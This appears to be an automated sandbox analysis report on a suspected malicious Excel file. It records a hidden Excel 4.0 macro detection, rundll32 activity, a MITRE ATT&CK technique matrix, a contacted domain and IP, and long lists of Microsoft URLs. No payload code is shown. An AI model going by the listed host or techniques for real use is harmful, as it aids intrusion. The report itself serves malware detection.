    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000002.00000002.228725160.0000000000D90000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000002.00000002.228725160.0000000000D90000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000002.00000002.228725160.0000000000D90000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000002.00000002.228725160.0000000000D90000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Heur.15528.xls10%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    pg.happyslot88.cc1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    pg.happyslot88.cc
    139.162.8.120
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
      high
      https://login.microsoftonline.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
        high
        https://shell.suite.office.com:144369F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
            high
            https://autodiscover-s.outlook.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                high
                https://cdn.entity.69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                  high
                  https://wus2-000.contentsync.69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                      high
                      https://powerlift.acompli.net69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v169F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                        high
                        https://cortana.ai69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                  high
                                  https://api.aadrm.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                        high
                                        https://cr.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                              high
                                              https://graph.ppe.windows.net69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                              high
                                                              https://graph.windows.net69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v269F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                          high
